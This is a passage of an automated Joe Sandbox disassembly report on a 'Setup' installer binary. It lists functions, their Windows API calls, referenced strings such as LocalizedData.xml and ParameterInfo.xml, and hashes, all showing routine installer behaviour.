                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D98EB8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateWindowExW.USER32(00000000,STATIC,00000000,0000000E,80000000,80000000,00000000,00000000,00000000,00000000,00000000), ref: 69D98F00
                                                                                                                                                                      • Part of subcall function 69DC8244: GetWindowLongW.USER32(?,000000F0), ref: 69DC826A
                                                                                                                                                                      • Part of subcall function 69DC8244: GetParent.USER32(?), ref: 69DC827C
                                                                                                                                                                      • Part of subcall function 69DC8244: GetWindowRect.USER32(?,?), ref: 69DC8296
                                                                                                                                                                      • Part of subcall function 69DC8244: GetWindowLongW.USER32(00000000,000000F0), ref: 69DC82AC
                                                                                                                                                                      • Part of subcall function 69DC8244: MonitorFromWindow.USER32(?,00000002), ref: 69DC82CB
                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 69D98F15
                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 69D98F25
                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00000010), ref: 69D98F32
                                                                                                                                                                      • Part of subcall function 69DABC49: SendMessageW.USER32(?,00000172,00000000,?), ref: 69DABC5A
                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 69D98F44
                                                                                                                                                                      • Part of subcall function 69DC8244: GetWindow.USER32(?,00000004), ref: 69DC8288
                                                                                                                                                                      • Part of subcall function 69DC8244: GetMonitorInfoW.USER32(00000000,?), ref: 69DC82E8
                                                                                                                                                                      • Part of subcall function 69DC8244: SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015), ref: 69DC83B8
                                                                                                                                                                    • ShowWindow.USER32(?,00000001), ref: 69D98F57
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$Long$Monitor$CreateDesktopFromImageInfoLoadMessageParentRectSendShow
                                                                                                                                                                    • String ID: STATIC
                                                                                                                                                                    • API String ID: 4041997823-1882779555
                                                                                                                                                                    • Opcode ID: 8d24eb2a3ba505eaaea1a79db28317753d53e10168a39cdff46b0d78e1aa50bb
                                                                                                                                                                    • Instruction ID: 599be55564adf04f1ea8b847be274f1a98f3ab1d26a5000dc5a46933261b20a4
                                                                                                                                                                    • Opcode Fuzzy Hash: 8d24eb2a3ba505eaaea1a79db28317753d53e10168a39cdff46b0d78e1aa50bb
                                                                                                                                                                    • Instruction Fuzzy Hash: 6A115175605211BFEB209F258C09E9BBFADEF8B360F104629F429D3290DB359C11CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DBACD8 Relevance: 12.1, APIs: 8, Instructions: 93COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 69DBACDF
                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000002,00000001(TokenIntegrityLevel),00000000,00000000,00000009,0000000C,69DA49C0,69D6A5D8,69D6A54C), ref: 69DBAD06
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DBAD08
                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000002,00000001(TokenIntegrityLevel),00000008,00000400,00000400,80070216), ref: 69DBAD81
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InformationToken$ErrorH_prolog3_Last
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 654496852-0
                                                                                                                                                                    • Opcode ID: 2d8a02c4204f533c94b2c31816e68daa4fcb4b745183bc20242449fa1564a100
                                                                                                                                                                    • Instruction ID: 7e769de6c4a69467f8b5bc5a6fb30916930189022b19591134d5283c174611c4
                                                                                                                                                                    • Opcode Fuzzy Hash: 2d8a02c4204f533c94b2c31816e68daa4fcb4b745183bc20242449fa1564a100
                                                                                                                                                                    • Instruction Fuzzy Hash: CA31FDBA800515DBCF11CF68CA41A9E77F8AF05771B218035E942AFA58EB31DE41CBE1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D85E2B Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 169COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 69D75D3F: __EH_prolog3.LIBCMT ref: 69D75D46
                                                                                                                                                                      • Part of subcall function 69D75D3F: GetModuleFileNameW.KERNEL32(69D50000,00000010,00000104,?,69DA831D,00000000), ref: 69D75D93
                                                                                                                                                                      • Part of subcall function 69D85B82: __EH_prolog3_GS.LIBCMT ref: 69D85B8C
                                                                                                                                                                      • Part of subcall function 69D85B82: _memset.LIBCMT ref: 69D85BBB
                                                                                                                                                                      • Part of subcall function 69D85B82: FindFirstFileW.KERNEL32(?,?,????), ref: 69D85BDA
                                                                                                                                                                      • Part of subcall function 69D85B82: FindClose.KERNEL32(?), ref: 69D85CC1
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D85FF0
                                                                                                                                                                      • Part of subcall function 69DC8EAB: _memcpy_s.LIBCMT ref: 69DC8EFC
                                                                                                                                                                      • Part of subcall function 69DA8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,69DB99FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 69DA8E6E
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,LocalizedData.xml,?,?,?,F0D05EFD,ParameterInfo.xml,00000000,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 69D85EF1
                                                                                                                                                                      • Part of subcall function 69D85CE1: __EH_prolog3.LIBCMT ref: 69D85CE8
                                                                                                                                                                      • Part of subcall function 69D85CE1: CoInitialize.OLE32(00000000), ref: 69D85D1A
                                                                                                                                                                      • Part of subcall function 69D85CE1: CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,?,?,?,00000014,69D85F14,?,?,?,?,F0D05EFD,ParameterInfo.xml,00000000), ref: 69D85D38
                                                                                                                                                                      • Part of subcall function 69D85CE1: CoUninitialize.OLE32(?,?,00000014,69D85F14,?,?,?,?,F0D05EFD,ParameterInfo.xml,00000000,?,ParameterInfo.xml,?,00000000,?), ref: 69D85DE8
                                                                                                                                                                      • Part of subcall function 69D85CE1: SysFreeString.OLEAUT32(00000738), ref: 69D85DF1
                                                                                                                                                                    Strings
                                                                                                                                                                    • LocalizedData.xml in resource folder %s, does not have a Language element, xrefs: 69D85F87
                                                                                                                                                                    • LocalizedData.xml, xrefs: 69D85EDF
                                                                                                                                                                    • LocalizedData.xml is missing in resource folder %s. Every resource folder needs a LocalizedData.xml, xrefs: 69D86026
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69D85E45, 69D85FA2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$FindH_prolog3Path$AppendCloseCreateException@8ExistsFirstFreeH_prolog3_InitializeInstanceModuleNameStringThrowUninitialize_memcpy_s_memset
                                                                                                                                                                    • String ID: LocalizedData.xml$LocalizedData.xml in resource folder %s, does not have a Language element$LocalizedData.xml is missing in resource folder %s. Every resource folder needs a LocalizedData.xml$ParameterInfo.xml
                                                                                                                                                                    • API String ID: 2922719316-412676173
                                                                                                                                                                    • Opcode ID: c6f89c65c8cfa759146e00bbd675dc98f18f9dbc0aebfcfdb55452bbdf188112
                                                                                                                                                                    • Instruction ID: 8db2f1259bfc2dbba96bdb86dd0206889d21682f8f0b981effce2e9aacd94034
                                                                                                                                                                    • Opcode Fuzzy Hash: c6f89c65c8cfa759146e00bbd675dc98f18f9dbc0aebfcfdb55452bbdf188112
                                                                                                                                                                    • Instruction Fuzzy Hash: 3B616B75408381DFC700DFA8C884A5EBBE8BF85318F448A6DF4A6D7A51DB35E5098B63
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D84DC0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 99COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D84DC7
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69DA8CD5: __EH_prolog3.LIBCMT ref: 69DA8CDC
                                                                                                                                                                      • Part of subcall function 69DA8C7A: __EH_prolog3.LIBCMT ref: 69DA8C81
                                                                                                                                                                      • Part of subcall function 69DA8C24: __EH_prolog3.LIBCMT ref: 69DA8C2B
                                                                                                                                                                      • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
                                                                                                                                                                      • Part of subcall function 69D78415: __EH_prolog3.LIBCMT ref: 69D7841C
                                                                                                                                                                      • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D84ED4
                                                                                                                                                                      • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
                                                                                                                                                                    Strings
                                                                                                                                                                    • " for Text element in , xrefs: 69D84E0D
                                                                                                                                                                    • Found duplicate ID attribute ", xrefs: 69D84DF8
                                                                                                                                                                    • \LocalizedData.xml. Duplicates not allowed., xrefs: 69D84E34
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69D84DE8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$DispatcherExceptionException@8ThrowUser
                                                                                                                                                                    • String ID: " for Text element in $Found duplicate ID attribute "$ParameterInfo.xml$\LocalizedData.xml. Duplicates not allowed.
                                                                                                                                                                    • API String ID: 3417717588-3340550128
                                                                                                                                                                    • Opcode ID: c6d05f152f3244774f10828bba000d0cdbc4d89d9b790319d697d75e51c1aeae
                                                                                                                                                                    • Instruction ID: 6376894deb8ed2d4e6dae1fc484f36e8bfe163ebdab973356ebbd93373da1774
                                                                                                                                                                    • Opcode Fuzzy Hash: c6d05f152f3244774f10828bba000d0cdbc4d89d9b790319d697d75e51c1aeae
                                                                                                                                                                    • Instruction Fuzzy Hash: 68414E76800148EFCB11DBF8C940EEDB7A8AF15328F548265F525EB6C1DB34DA198B72
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB401F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 98threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DB4026
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • GetThreadLocale.KERNEL32(?,DHTMLHeader.html), ref: 69DB4041
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(69D50000,00000010,00000104), ref: 69DB40B3
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,00000014,00000000), ref: 69DB4101
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileH_prolog3$ExistsLocaleModuleNamePathThread
                                                                                                                                                                    • String ID: %04d\%s$DHTMLHeader.html
                                                                                                                                                                    • API String ID: 3575165106-1224721414
                                                                                                                                                                    • Opcode ID: 4b055991096b735d65ad4e7b4c423d17505ce38f9eecc002908bd1349396e941
                                                                                                                                                                    • Instruction ID: 3e6e2e30d89a1f6f580b41dd46843b4a29ba17a7bb073a1381b00c2ebfbe409d
                                                                                                                                                                    • Opcode Fuzzy Hash: 4b055991096b735d65ad4e7b4c423d17505ce38f9eecc002908bd1349396e941
                                                                                                                                                                    • Instruction Fuzzy Hash: 8D415A7590015ADFDF00DFA8C885EEEBBB9BF05318F008578E511EB691DB349A09CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698E30B1 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 698F6041: __EH_prolog3.LIBCMT ref: 698F6048
                                                                                                                                                                      • Part of subcall function 698F6041: GetCommandLineW.KERNEL32(0000001C,698E30C2,?), ref: 698F604D
                                                                                                                                                                    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?), ref: 698E3136
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CommandExceptionH_prolog3LineRaise
                                                                                                                                                                    • String ID: CreateLayout$Install$Repair$Uninstall$UninstallPatch
                                                                                                                                                                    • API String ID: 683617612-791770018
                                                                                                                                                                    • Opcode ID: 6148ff580f7deae8f49492e07d13e95aa24a4ffb840ce71c79f24993685d1dde
                                                                                                                                                                    • Instruction ID: 90f7b2f41461e1228ed73a9e214d2ad1ea8d9be14fc646a95563da6bedab55fd
                                                                                                                                                                    • Opcode Fuzzy Hash: 6148ff580f7deae8f49492e07d13e95aa24a4ffb840ce71c79f24993685d1dde
                                                                                                                                                                    • Instruction Fuzzy Hash: 7F01B53620854DA7DE20D76EC821E4D7659AF923B8F558C2FFA14DB1B0DA32DC4A8351
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698E33F3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41libraryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698E33FA
                                                                                                                                                                    • LoadLibraryW.KERNEL32(?,00000008,698E3377,?), ref: 698E3427
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 698E3437
                                                                                                                                                                      • Part of subcall function 698DB93E: __EH_prolog3.LIBCMT ref: 698DB945
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 698E344B
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 698E346E
                                                                                                                                                                    Strings
                                                                                                                                                                    • ::LoadLibrary(%s) failed with error %d, xrefs: 698E343C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorH_prolog3Last$Exception@8LibraryLoadThrow
                                                                                                                                                                    • String ID: ::LoadLibrary(%s) failed with error %d
                                                                                                                                                                    • API String ID: 3804648058-20907036
                                                                                                                                                                    • Opcode ID: f4021baefaf40290829fc3aafba2d70dc5bb6b2419fc2d3805e343cf90505584
                                                                                                                                                                    • Instruction ID: 4e3cc54a746aaed292a24eb8358e82b5beda24e74d6ca3115bdbbf3e462a1b16
                                                                                                                                                                    • Opcode Fuzzy Hash: f4021baefaf40290829fc3aafba2d70dc5bb6b2419fc2d3805e343cf90505584
                                                                                                                                                                    • Instruction Fuzzy Hash: 5C018FB1900206AFDB00DF69C845B2E7AA4FF21344F90892DE418DB250D775D91ACBD1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D75485 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D7548C
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,0000002C,69D77DAF,?,?,?,?,?,00000000,?,?,69D6AB18,00000008,69D77CD9), ref: 69D7549C
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 69D754B9
                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 69D754E0
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$AddressHandleInfoModuleNativeProcSystem
                                                                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                    • API String ID: 2427612476-192647395
                                                                                                                                                                    • Opcode ID: b3b34822d3a740543c38b717507f0cea9a17b7efd6ccf98c4534bcd60a008d2f
                                                                                                                                                                    • Instruction ID: 613589a392bfc3238981eac8542b017772e0d2e1bca4fe3ea6a36d6fd2c68508
                                                                                                                                                                    • Opcode Fuzzy Hash: b3b34822d3a740543c38b717507f0cea9a17b7efd6ccf98c4534bcd60a008d2f
                                                                                                                                                                    • Instruction Fuzzy Hash: 95F09075A54605EBEF10EFA4DA15B9D3276AF8131AFA0C434F000EBD50DB78894987A6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F681A Relevance: 10.5, APIs: 7, Instructions: 34windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698F6821
                                                                                                                                                                    • GetLastError.KERNEL32(00000008,698F50A0,?,00000000,00000000,?,?,698E8DC8,?,%1!I64u!,?,?), ref: 698F6834
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,698E8DC8,?,%1!I64u!,?,?), ref: 698F6840
                                                                                                                                                                    • FormatMessageW.KERNEL32(00000500,00000000,00000000,00000000,2F25BB2A,00000000,2F25BB2A,?,698E8DC8,?,%1!I64u!,?,?), ref: 698F6854
                                                                                                                                                                    • GetLastError.KERNEL32(?,698E8DC8,?,%1!I64u!,?,?), ref: 698F685A
                                                                                                                                                                    • SetLastError.KERNEL32(?,?,698E8DC8,?,%1!I64u!,?,?), ref: 698F6868
                                                                                                                                                                    • LocalFree.KERNEL32(2F25BB2A,?,2F25BB2A,?,698E8DC8,?,%1!I64u!,?,?), ref: 698F6878
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$FormatFreeH_prolog3LocalMessage
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 69132360-0
                                                                                                                                                                    • Opcode ID: f2907c43dca608ffed21fd5a96372f7babef85b52d0297455534f50db59782a1
                                                                                                                                                                    • Instruction ID: 5d64464df16a0331c2d8da959f53cccaa38ba5dcc9c46625244896f176f30d42
                                                                                                                                                                    • Opcode Fuzzy Hash: f2907c43dca608ffed21fd5a96372f7babef85b52d0297455534f50db59782a1
                                                                                                                                                                    • Instruction Fuzzy Hash: 40F0F935800159EBDF00EFA6CD44DAEBF79FFA1745F00541EA520A2060DB718D16DBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA3A10 Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSecurityDescriptorLength.ADVAPI32(?,69D6A5CC,?), ref: 69DA3A1F
                                                                                                                                                                    • _malloc.LIBCMT ref: 69DA3A29
                                                                                                                                                                      • Part of subcall function 69DCBFB3: __FF_MSGBANNER.LIBCMT ref: 69DCBFCC
                                                                                                                                                                      • Part of subcall function 69DCBFB3: __NMSG_WRITE.LIBCMT ref: 69DCBFD3
                                                                                                                                                                      • Part of subcall function 69DCBFB3: RtlAllocateHeap.NTDLL(00000000,00000001,?,69DA831D,00000000,?,69DCC0C9,69DAF845,00000C00,00000020,69DAF845,?), ref: 69DCBFF8
                                                                                                                                                                    • GetSecurityDescriptorControl.ADVAPI32(?,00000002,69DA7448), ref: 69DA3A49
                                                                                                                                                                    • _free.LIBCMT ref: 69DA3A5D
                                                                                                                                                                    • _memcpy_s.LIBCMT ref: 69DA3A80
                                                                                                                                                                    • MakeSelfRelativeSD.ADVAPI32(?,69DA744C,69DA744C), ref: 69DA3A97
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DescriptorSecurity$AllocateControlHeapLengthMakeRelativeSelf_free_malloc_memcpy_s
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2479111529-0
